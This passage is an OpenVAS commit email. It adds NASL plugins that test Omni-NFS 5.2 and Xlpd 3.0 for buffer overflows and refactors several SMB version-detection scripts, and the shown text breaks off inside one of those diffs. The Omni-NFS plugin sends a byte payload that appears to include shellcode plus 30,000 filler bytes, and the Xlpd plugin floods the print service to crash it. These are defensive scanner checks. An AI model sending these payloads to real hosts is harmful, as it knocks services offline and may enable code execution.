[Openvas-commits] r5443 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Oct 8 20:03:38 CEST 2009


Author: mime
Date: 2009-10-08 20:03:34 +0200 (Thu, 08 Oct 2009)
New Revision: 5443

Added:
   trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl
   trunk/openvas-plugins/scripts/Xlpd_36610.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/cve_current.txt
   trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl
   trunk/openvas-plugins/scripts/secpod_smb_func.inc
   trunk/openvas-plugins/scripts/smb_explorer_version.nasl
   trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl
   trunk/openvas-plugins/scripts/spybot_detection.nasl
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/ChangeLog	2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,5 +1,21 @@
 2009-10-08  Michael Meyer <michael.meyer at intevation.de>
 
+	* scripts/Xlpd_36610.nasl,
+	scripts/Omni_NFS_36608.nasl:
+	Added new plugins.
+
+	* scripts/spybot_detection.nasl,
+	scripts/cisco_vpn_client_detect.nasl,
+	scripts/smb_explorer_version.nasl,
+	scripts/sonicwall_vpn_client_detect.nasl:
+	Modified so that they don't need smb_func.inc
+	anymore.
+
+	* scripts/secpod_smb_func.inc:
+	Added function GetVersionFromFile().
+
+2009-10-08  Michael Meyer <michael.meyer at intevation.de>
+
 	* scripts/showmount.nasl:
 	Added script_copyright().
 

Modified: trunk/openvas-plugins/cve_current.txt
===================================================================
--- trunk/openvas-plugins/cve_current.txt	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/cve_current.txt	2009-10-08 18:03:34 UTC (rev 5443)
@@ -119,3 +119,5 @@
 CVE-2009-3562			SecPod
 CVE-2009-3561			SecPod
 CVE-2009-3525			SecPod
+36610				Greenbone	svn		R
+36608				Greenbone	svn		R

Added: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl
===================================================================
--- trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl	2009-10-08 18:03:34 UTC (rev 5443)
@@ -0,0 +1,123 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100297);
+ script_bugtraq_id(36608);
+ script_version ("1.0-$Revision$");
+
+ script_name("Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities");
+
+desc = "Overview:
+Omni-NFS is prone to multiple stack-based buffer-overflow
+vulnerabilities because the application fails to properly bounds-check
+user-supplied network data before copying it into an insufficiently
+sized memory buffer. The issues affect both server and client.
+
+Exploiting these issues allows attackers to execute arbitrary machine
+code in the context of users running the affected application. Failed
+attempts will likely crash the application, resulting in denial-of-
+service conditions.
+
+Omni-NFS 5.2 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/36608
+http://www.xlink.com/nfs_products/NFS_Server/NFS_Server.htm
+
+Risk factor : Low";
+
+ script_description(desc);
+ script_summary("Determine if Omni-NFS is prone to a Stack Buffer Overflow");
+ script_category(ACT_DENIAL);
+ script_family("Buffer overflow");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
+ script_require_ports("Services/ftp", 21);
+ exit(0);
+}
+
+include("misc_func.inc");
+include("ftp_func.inc");
+
+if(safe_checks())exit(0);
+
+port = get_kb_item("Services/ftp");
+if(!port)port = 21;
+
+if(get_kb_item('ftp/'+port+'/broken'))exit(0);
+if(!get_port_state(port))exit(0);
+
+banner = get_ftp_banner(port:port);
+
+if("XLINK" >!< banner)exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+crapdata = crap(length:30000);
+
+req = raw_string(0x4e,0x40,0x96,0xb5,0x46,0x89,0xe3,0x4a,0x1c,0xb1,0x98,0x2c,0xb4,0xb3,0x7b,0x39,
+0xf5,0xa9,0x7c,0x15,0xb7,0xba,0x8c,0xe1,0x4b,0x90,0x73,0x27,0x7b,0x70,0x75,0x10,
+0xe0,0x72,0x4b,0x83,0xeb,0x7a,0x79,0x3c,0xb7,0x48,0x71,0x24,0x7d,0x2d,0xbe,0x40,
+0xb0,0x97,0x46,0x0c,0x1c,0x96,0x80,0xd4,0x3b,0xe2,0x41,0x1d,0xba,0x81,0xfd,0x37,
+0x04,0x15,0xbb,0x43,0xb6,0x49,0x8d,0x93,0x77,0x66,0x42,0x76,0x78,0x74,0x7f,0x2c,
+0x0b,0xf5,0x99,0x47,0xb8,0x9b,0x98,0x29,0xe3,0x05,0x4e,0xb5,0xa9,0xb4,0x14,0x4a,
+0xbf,0x86,0xd6,0xb3,0xb9,0x77,0x31,0xf9,0xa8,0xb2,0x7d,0x02,0xd5,0xb1,0x78,0x35,
+0x73,0x67,0x7f,0x2a,0xe0,0x34,0x71,0x4f,0x7c,0x03,0xfc,0x91,0x74,0x19,0xeb,0x32,
+0xf6,0xe2,0x3f,0x9f,0x7b,0x1a,0xc1,0xf8,0x92,0xbb,0xb3,0x7a,0x18,0xe1,0x42,0x87,
+0xf9,0xb4,0x4b,0x79,0x04,0xba,0x75,0x38,0xe3,0x3c,0x98,0x67,0xb6,0xbf,0xa9,0x09,
+0xf8,0x91,0xb8,0x4e,0x43,0xb9,0xb7,0x2d,0x72,0x12,0xfc,0x3f,0x9b,0x8d,0x49,0x76,
+0x05,0x23,0xd4,0x2c,0x93,0x46,0xb2,0x0c,0x15,0x4a,0x90,0x37,0x1b,0xc0,0xd6,0x24,
+0xb5,0x70,0x14,0x48,0x66,0xbe,0x27,0xa8,0x34,0x96,0x88,0xd5,0x1c,0x1d,0x99,0xb0,
+0x9f,0x40,0x97,0xf5,0xfd,0x35,0x47,0x92,0xb1,0x41,0x4f,0x81,0xc4,0xff,0xef,0xff,
+0xff,0x44,0x31,0xc9,0xbe,0x1c,0x89,0xb0,0x67,0xdb,0xda,0xd9,0x74,0x24,0xf4,0xb1,
+0x02,0x58,0x31,0x70,0x13,0x83,0xc0,0x04,0x03,0x70,0x0f,0xe2,0xe9,0x08,0x74,0x33,
+0xe3,0xf4,0x8a,0x70,0x9c,0xf0,0x01,0x10) + crapdata + raw_string(0x0d,0x0a);
+		  
+send(socket:soc, data:req);
+close(soc);
+
+sleep(10);
+
+soc1 = open_sock_tcp(port);
+if(!soc1) {
+ security_warning(port:port);
+ exit(0);
+
+} else {
+
+  for(i=0;i<5;i++) {
+     if(!ftp_recv_line(socket:soc1)) {
+       security_warning(port:port);
+       close(soc1);
+       exit(0);
+     }
+ }
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/Xlpd_36610.nasl
===================================================================
--- trunk/openvas-plugins/scripts/Xlpd_36610.nasl	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/Xlpd_36610.nasl	2009-10-08 18:03:34 UTC (rev 5443)
@@ -0,0 +1,90 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Xlpd Remote Denial of Service Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100296);
+ script_bugtraq_id(36610);
+ script_version ("1.0-$Revision$");
+
+ script_name("Xlpd Remote Denial of Service Vulnerability");
+
+desc = "Overview:
+Xlpd is prone to a denial-of-service vulnerability because it fails to
+adequately validate user-supplied input.
+
+An attacker can exploit this issue to crash the affected application,
+denying service to legitimate users. Given the nature of this issue,
+the attacker may also be able to run arbitrary code, but this has not
+been confirmed.
+
+Xlpd 3.0 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/36610
+http://www.netsarang.com/products/xlp_detail.html
+http://www.securityfocus.com/archive/1/507029
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Xlpd is prone to a denial-of-service vulnerability");
+ script_category(ACT_DENIAL);
+ script_family("Denial of Service");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/lpd", 515);
+ exit(0);
+}
+
+include("misc_func.inc");
+
+if(safe_checks())exit(0);
+
+port = get_kb_item("Services/lpd");
+if(!port)port="515";
+
+if(!get_port_state(port))exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+req = crap(data:raw_string(0x41),length:100000);
+send(socket:soc, data:req);
+close(soc);
+
+sleep(2);
+
+soc1 = open_sock_tcp(port);
+if(!soc1) {
+   security_warning(port:port);
+   exit(0);
+}  else {
+   close(soc1);
+}  
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/Xlpd_36610.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl	2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,31 +1,7 @@
-#
 # Script Written By Ferdy Riphagen 
 # Script distributed under the GNU GPLv2 License. 
-#
-# Tenable grants a special exception for this plugin to use the library 
-# 'smb_func.inc'. This exception does not apply to any modified version of 
-# this plugin.
-#
-# kst-depend-smb
+# Modified by Michael Meyer <michael.meyer at intevation.de>
 
-desc = "
-Synopsis :
-
-There is a VPN client installed on the remote Windows host. 
-
-Description :
-
-The Cisco VPN Client is installed on the remote Windows host.  This
-software can be used for secure connectivity. 
-
-See also :
-
-http://www.cisco.com/en/US/products/sw/secursw/ps2308/index.html
-
-Risk factor :
-
-None"; 
-
 if (description) {
  script_id(80037);
  script_version("$Revision: 1.5 $");
@@ -33,107 +9,45 @@
 
  name = "Cisco VPN Client Version Detection";
  script_name(name);
+
+ desc = "Overview: This script is detects the installed version of Cisco VPN
+ Client and sets the result in KB.
+
+ Risk Factor: Informational";
+
  summary = "Detects the version number of the Cisco VPN Client in use";
  script_summary(summary);
  script_category(ACT_GATHER_INFO);
- script_family("Windows");
+ script_family("Service detection");
  script_copyright("This script is Copyright (C) 2007 Ferdy Riphagen");
-
  script_require_ports(139, 445);
  script_dependencies("secpod_reg_enum.nasl");
  script_require_keys("SMB/login", "SMB/password", "SMB/name", "SMB/transport");
  exit(0);
 }
 
-include("smb_func.inc");
-include("misc_func.inc");
+include("smb_nt.inc");
+include("secpod_smb_func.inc");
 
-login = kb_smb_login();
-pass = kb_smb_password();
-port = kb_smb_transport();
-name = kb_smb_name();
-domain = kb_smb_domain();
-
-if(!get_port_state(port)) exit(0);
-soc = open_sock_tcp(port);
-if(!soc || (!name)) exit(0);
-
-function cleanup(opt) {
-	
-	if (opt == 1) exit(0);
-	else if (opt == 2) {
-		NetUseDel();
-		exit(0);
-	}
+if(!get_kb_item("SMB/WindowsVersion")){
+ exit(0);
 }
 
-# modified 'get_dword' to get the bytes in the right format.
-function get_dword2(blob, pos) {
- 	global_var blob, pos;
-
- 	if (pos > (strlen(blob) - 4)) return NULL;
-	return (ord(blob[pos]) << 16) +
- 			(ord(blob[pos+1]) << 24) +
-			(ord(blob[pos+2])) +
- 			(ord(blob[pos+3]) << 8);
+if(!registry_key_exists(key:"SOFTWARE\Cisco Systems\VPN Client")){
+  exit(0);  
 }
 
-session_init(socket:soc, hostname:name);
-ipc = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$"); 
-if (ipc != 1) cleanup(opt:2);
-
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);
-if (isnull(hklm)) cleanup(opt:2);
-
 key = "SOFTWARE\Cisco Systems\VPN Client";
-regopen = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);
-if (!isnull(regopen)) {
- 	value = RegQueryValue(handle:regopen, item:"InstallPath");
-	RegCloseKey(handle:regopen);
-	RegCloseKey(handle:hklm);
-	if(!isnull(value)) path = value[1]; 
-	else cleanup(opt:2);
-}
-else cleanup(opt:2);
+path = registry_get_sz(key:key, item:"InstallPath");
 
-share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
-exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1vpngui.exe", string:path);
-
-conn = NetUseAdd(login:login, password:pass, domain:domain, share:share);
-if (conn != 1) cleanup(opt:1);
-
-fopen = CreateFile(
-	file:exe,
-    desired_access:GENERIC_READ,
-	file_attributes:FILE_ATTRIBUTE_NORMAL,
-	share_mode:FILE_SHARE_READ,
-	create_disposition:OPEN_EXISTING
-);
-
-if (isnull(fopen)) cleanup(opt:2);
-ret = GetFileVersionEx(handle:fopen);
-CloseFile(handle:fopen);
-
-if (!isnull(ret)) children = ret['Children'];
-if (!isnull(children)) info = children['VarFileInfo'];
-if (isnull(info)) cleanup(opt:2);
-
-trans = toupper(hexstr(dec2hex(
-			num:get_dword2(
-			blob:info['Translation'], pos:0))));
-if (isnull(trans)) cleanup(opt:2);
-
-fileinfo = children['StringFileInfo'];
-if (!isnull(fileinfo)) data = fileinfo[trans];
-if (!isnull(data)) ver = data['ProductVersion'];
-
-if (!isnull(ver)) {
-	set_kb_item(name:"SMB/CiscoVPNClient/Version", value:ver);
-	report = string(
-		desc, "\n\n",
-		"Plugin output :\n\n",
-		"Version ", ver, " of the Cisco VPN Client is installed.\n"
-		);
-	security_note(port:port, data:report);
+if(path)
+{
+  file = path + "\vpngui.exe";
+  version = GetVersionFromFile(file:file,verstr:"prod");
+  if(!isnull(version)){
+    set_kb_item(name:"SMB/CiscoVPNClient/Version", value:version);
+    exit(0);
+  } 
 }
-cleanup(opt:2);
+
+exit(0);

Modified: trunk/openvas-plugins/scripts/secpod_smb_func.inc
===================================================================
--- trunk/openvas-plugins/scripts/secpod_smb_func.inc	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/secpod_smb_func.inc	2009-10-08 18:03:34 UTC (rev 5443)
@@ -695,3 +695,64 @@
          (ord(data[2]) << 16) + (ord(data[3]) << 24));
   }
 }
+
+function GetVersionFromFile(file, verstr) {
+
+  local_var file, share, verstr, mshare, soc, r, prot, uid, tid, ver;
+
+  mshare = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:file);
+  file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:file);
+
+  soc = open_sock_tcp(port);
+  if(!soc){
+    return NULL;
+  }
+
+  r = smb_session_request(soc:soc, remote:name);
+  if(!r)
+  {
+    close(soc);
+    return NULL;
+  }
+
+  prot = smb_neg_prot(soc:soc);
+  if(!prot)
+  {
+    close(soc);
+    return NULL;
+  }
+
+  r = smb_session_setup(soc:soc, login:login, password:pass,
+                        domain:domain, prot:prot);
+  if(!r)
+  {
+    close(soc);
+    return NULL;
+  }
+
+  uid = session_extract_uid(reply:r);
+  r = smb_tconx(soc:soc, name:name, uid:uid, share:mshare);
+
+  tid = tconx_extract_tid(reply:r);
+  if(!tid)
+  {
+    close(soc);
+    return NULL;
+  }
+  fid = OpenAndX(socket:soc, uid:uid, tid:tid, file:file);
+  if(!fid)
+  {
+    close(soc);
+    return NULL;
+  }
+  if(isnull(verstr)) {
+    ver = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid);
+  } else {
+    ver = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid,verstr:verstr);
+  }
+  close(soc);
+
+  return ver;
+ 
+
+}  

Modified: trunk/openvas-plugins/scripts/smb_explorer_version.nasl
===================================================================
--- trunk/openvas-plugins/scripts/smb_explorer_version.nasl	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/smb_explorer_version.nasl	2009-10-08 18:03:34 UTC (rev 5443)
@@ -97,7 +97,7 @@
 #==================================================================#
 # Main code                                                        #
 #==================================================================#
-include("smb_func.inc");
+
 warning = 0;
 
 access = get_kb_item("SMB/registry_full_access");

Modified: trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl	2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,34 +1,17 @@
 #
 # Script Written By Ferdy Riphagen 
 # Script distributed under the GNU GPLv2 License. 
-#
-# Tenable grants a special exception for this plugin to use the library 
-# 'smb_func.inc'. This exception does not apply to any modified version of 
-# this plugin.
-#
-# kst-depend-smb
+# Modified by Michael Meyer <michael.meyer at intevation.de>
 
 if (description) {
  script_id(80044);
  script_version("$Revision: 1.1 $");
 
- desc = "
-Synopsis :
+ desc = "Overview: This script detects the installed version of
+SonicWall Global VPN Client and sets the result in KB.
 
-There is a VPN client installed on the remote host.
+Risk Factor: Informational";
 
-Description :
-
-The SonicWall Global VPN Client is installed on the remote system. This
-software can be used to establish secure remote connections. 
-
-See also :
-
-http://www.sonicwall.com/
-
-Risk factor :
-
-None"; 
  script_description(desc);
 
  name = "SonicWall Global VPN Client Detection";
@@ -37,7 +20,7 @@
  script_summary(summary);
  
  script_category(ACT_GATHER_INFO);
- script_family("Windows");
+ script_family("Service detection");
  script_copyright("This script is Copyright (C) 2008 Ferdy Riphagen");
 
  script_require_ports(139, 445);
@@ -46,83 +29,30 @@
  exit(0);
 }
 
-include("smb_func.inc");
-include("misc_func.inc");
+include("smb_nt.inc");
+include("secpod_smb_func.inc");
 
-login = kb_smb_login();
-pass = kb_smb_password();
-port = kb_smb_transport();
-name = kb_smb_name();
-domain = kb_smb_domain();
-
-if(!get_port_state(port)) exit(0);
-soc = open_sock_tcp(port);
-if(!soc || (!name)) exit(0);
-
-session_init(socket:soc, hostname:name);
-ipc = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$"); 
-if (ipc != 1) exit(0);
-
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);
-if (isnull(hklm)) {
-	NetUseDel();
-	exit(0);
+if(!get_kb_item("SMB/WindowsVersion")){
+   exit(0);
 }
 
-path = NULL;
 key = "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\SWGVpnClient.exe";
-regopen = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);
-if (!isnull(regopen)) {
- 	value = RegQueryValue(handle:regopen, item:"Path");
-	RegCloseKey(handle:regopen);
-	RegCloseKey(handle:hklm);
-	if(!isnull(value)) path = value[1]; 
-}
-if (isnull(path)) {
-	RegCloseKey(handle:hklm);
-	NetUseDel();
-	exit(0);
-}
 
-share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
-exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\SWGVpnClient.exe", string:path);
-
-conn = NetUseAdd(login:login, password:pass, domain:domain, share:share);
-if (conn != 1) {
-	NetUseDel();
-	exit(0);
+if(!registry_key_exists(key:key)){
+    exit(0);
 }
 
-fopen = CreateFile(
-	file:exe,
-        desired_access:GENERIC_READ,
-	file_attributes:FILE_ATTRIBUTE_NORMAL,
-	share_mode:FILE_SHARE_READ,
-	create_disposition:OPEN_EXISTING
-);
+path = registry_get_sz(key:key, item:"Path");
 
-if (isnull(fopen)) {
-	NetUseDel();
-	exit(0);
-}
+if(path) {
 
-ret = GetFileVersion(handle:fopen);
-CloseFile(handle:fopen);
-NetUseDel();
+  file = path + "\SWGVpnClient.exe";
+  version = GetVersionFromFile(file:file,verstr:"prod");
+  if(!isnull(version)){
+    set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Version", value:version);
+    set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Path", value:path);
+    exit(0);
+  }  
+}  
 
-if (!isnull(ret)) 
-{
-	ver = string(ret[0] + '.' + ret[1] + '.' + ret[2] + '.' + ret[3]);
-
-	set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Version", value:ver);
-	set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Path", value:path);
-
-	report = string("\n",
-			"Version ", ver, " of the SonicWall Global VPN Client is installed\n",
-                        "under :\n",
-                        "\n",
-                        "  ", path
-	);
-	security_note(port:port, extra:report);
-}
 exit(0);

Modified: trunk/openvas-plugins/scripts/spybot_detection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/spybot_detection.nasl	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/spybot_detection.nasl	2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,15 +1,9 @@
 #
 # (C) Josh Zlatin-Amishav and Tenable Network Security
 # GPLv2
-#
-# Tenable grants a special exception for this plugin to use the library 
-# 'smb_func.inc'. This exception does not apply to any modified version of 
-# this plugin.
-#
-# kst-depend-smb
+# Modified by Michael Meyer <michael.meyer at intevation,de>
 
- desc = "
-Synopsis :
+ desc = "Synopsis :
 
 The remote Windows host has a spyware detection program installed on it.
 
@@ -20,11 +14,9 @@
 kinds from your computer.
 
 See also :
-
 http://www.safer-networking.org/
 
 Risk factor :
-
 None";
 
 if(description)
@@ -34,195 +26,175 @@
 
  name = "Spybot Search & Destroy Detection";
  script_name(name);
- 
+
  script_description(desc);
- 
+
  summary = "Checks whether Spybot Search & Destroy is installed";
 
  script_summary(summary);
  script_category(ACT_GATHER_INFO);
- 
+
  script_copyright("This script is Copyright (C) 2006 Josh Zlatin-Amishav and Tenable Network Security");
- family = "Windows";
+ family = "Service detection";
  script_family(family);
- 
+
  script_dependencies("secpod_reg_enum.nasl");
- script_require_keys("SMB/name", "SMB/login", "SMB/password", "SMB/transport"); 
+ script_require_keys("SMB/name", "SMB/login", "SMB/password", "SMB/transport");
  script_require_ports(139, 445);
  exit(0);
 }
 
+include("smb_nt.inc");
+include("secpod_smb_func.inc");
+include("global_settings.inc");
 
-include("smb_func.inc");
-include("secpod_reg.inc");
+ if(!get_kb_item("SMB/WindowsVersion")){
+   exit(0);
+ }
 
+ name   =  kb_smb_name();
+ login  =  kb_smb_login();
+ pass   =  kb_smb_password();
+ domain =  kb_smb_domain();
+ port   =  kb_smb_transport();
 
-name 	= kb_smb_name();
-login	= kb_smb_login();
-pass  	= kb_smb_password();
-domain	= kb_smb_domain();
-port    = kb_smb_transport();
+ if(!port) port = 139;
+ if(!get_port_state(port))exit(0);
 
-if(!get_port_state(port))exit(0);
-soc = open_sock_tcp(port);
-if(!soc)exit(1);
+ soc = open_sock_tcp(port);
+ if(!soc){
+        exit(0);
+ }
 
-session_init(socket:soc, hostname:name);
-r = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$");
-if ( r != 1 ) 
-{
-  NetUseDel();
-  exit(0);
-}
+ r = smb_session_request(soc:soc, remote:name);
+ if(!r)
+ {
+        close(soc);
+        exit(0);
+ }
 
+ prot = smb_neg_prot(soc:soc);
+ if(!prot)
+ {
+        close(soc);
+        exit(0);
+ }
 
-# First find where the executable is installed on the remote host
-# Connect to remote registry.
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);
-if (isnull(hklm)) 
-{
-  if (log_verbosity > 1) debug_print("can't connect to the remote registry!", level:0);
-  NetUseDel();
-  exit(0);
-}
+ r = smb_session_setup(soc:soc, login:login, password:pass,
+                       domain:domain, prot:prot);
+ if(!r)
+ {
+        close(soc);
+        exit(0);
+ }
 
+ uid = session_extract_uid(reply:r);
+ r = smb_tconx(soc:soc, name:name, uid:uid, share:"IPC$");
+ tid = tconx_extract_tid(reply:r);
+ if(!tid)
+ {
+        close(soc);
+        exit(0);
+ }
 
-# Determine where Spybot S&D is installed
-key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Spybot - Search & Destroy_is1";
-key_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);
-if (!isnull(key_h)) {
-  value = RegQueryValue(handle:key_h, item:"Inno Setup: App Path");
-  if (!isnull(value)) path = value[1];
-  else path = NULL;
-  
-  RegCloseKey(handle:key_h);
-}
-else path = NULL;
-RegCloseKey(handle:hklm);
+ r = smbntcreatex(soc:soc, uid:uid, tid:tid, name:"\winreg");
+ if(!r)
+ {
+        close(soc);
+        exit(0);
+ }
 
-if (isnull(path)) {
-  NetUseDel();
-  exit(0);
-}
+ pipe = smbntcreatex_extract_pipe(reply:r);
+ if(!pipe)
+ {
+        close(soc);
+        exit(0);
+ }
 
+ r = pipe_accessible_registry(soc:soc, uid:uid, tid:tid, pipe:pipe);
+ if(!r)
+ {
+        close(soc);
+        exit(0);
+ }
 
-# Get the file version / latest sigs.
-share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
-exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\SpybotSD.exe", string:path);
-rules = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\Updates\downloaded.ini", string:path);
-  
-r = NetUseAdd(login:login, password:pass, domain:domain, share:share);
-if (r != 1) {
-  if (log_verbosity > 1) debug_print("can't connect to the remote share (", r, ")!", level:0);
-  NetUseDel();
-  exit(0);
-}
+ handle = registry_open_hklm(soc:soc, uid:uid, tid:tid, pipe:pipe);
+ if(!handle)
+ {
+        close(soc);
+        exit(0);
+ }
 
-fh = CreateFile(
-  file:exe,
-  desired_access:GENERIC_READ,
-  file_attributes:FILE_ATTRIBUTE_NORMAL,
-  share_mode:FILE_SHARE_READ,
-  create_disposition:OPEN_EXISTING
-);
-if (isnull(fh))
-{
-  if (log_verbosity > 1) debug_print("can't open ", exe, "!", level:0);
-  NetUseDel();
-  exit(0);
-}
+ handle = registry_open_hklm(soc:soc, uid:uid, tid:tid, pipe:pipe);
+ if(!handle)
+ {
+        close(soc);
+        exit(0);
+ }
 
-version = GetFileVersion(handle:fh);
-CloseFile(handle:fh);
-if (isnull(version))
-{
-  if (log_verbosity > 1) debug_print("can't get file version for ", exe, "!", level:0);
-  NetUseDel();
-  exit(0);
-}
+ key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\";
+ key_h = registry_get_key(soc:soc, uid:uid, tid:tid, pipe:pipe,
+                          key:key, reply:handle);
+ if(!key_h)
+ {
+ 	exit(0);
+ }
+ 
+ enumKeys = registry_enum_key(soc:soc, uid:uid, tid:tid,
+                              pipe:pipe, reply:key_h);
 
-ver = string(version[0], ".", version[1], ".", version[2], ".", version[3]);
-set_kb_item(name:"SMB/SpybotSD/version", value:ver);
+ foreach entry (enumKeys)
+ {
+    tmp = registry_get_sz(item:"DisplayName", key:key + entry);
 
+    if("Spybot" >< tmp) {
 
-# Get release date info about the detection rules (includes.zip)
-fh = CreateFile(
-  file:rules,
-  desired_access:GENERIC_READ,
-  file_attributes:FILE_ATTRIBUTE_NORMAL,
-  share_mode:FILE_SHARE_READ,
-  create_disposition:OPEN_EXISTING
-);
-if (isnull(fh))
-{
-  if (log_verbosity > 1) debug_print("can't open ", rules, "!", level:0);
-  NetUseDel();
-  exit(0);
-}
+       version = registry_get_sz(item:"DisplayVersion", key:key + entry);
+       if(!isnull(version)) {
+	 set_kb_item(name:"SMB/SpybotSD/version", value:version);
+       } 
 
-contents = ReadFile(handle:fh, offset:0, length:85);
-CloseFile(handle:fh);
-if (isnull(contents))
-{
-  if (log_verbosity > 1) debug_print("can't read ", rules, "!", level:0);
-  NetUseDel();
-  exit(0);
-}
-NetUseDel();
+       path = registry_get_sz(item:"InstallLocation", key:key + entry);
+       
+       if(path) {
+         path += "Updates";
+	 share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:path);
+	 path  = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:path);
+         file = path + "\downloaded.ini";
+       
+	 contents = read_file(file:file, share:share, offset:0, count:85);
 
-sigs_target = strstr(contents, "ReleaseDate=");
-if (strlen(sigs_target) >= 22) sigs_target = substr(sigs_target, 12, 22);
-if (isnull(sigs_target)) sigs_target = "n/a";
+	 if(contents && "ReleaseDate" >< contents) {
 
-if (sigs_target =~ "[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]") {
-  a = split(sigs_target, sep:"-", keep:0);
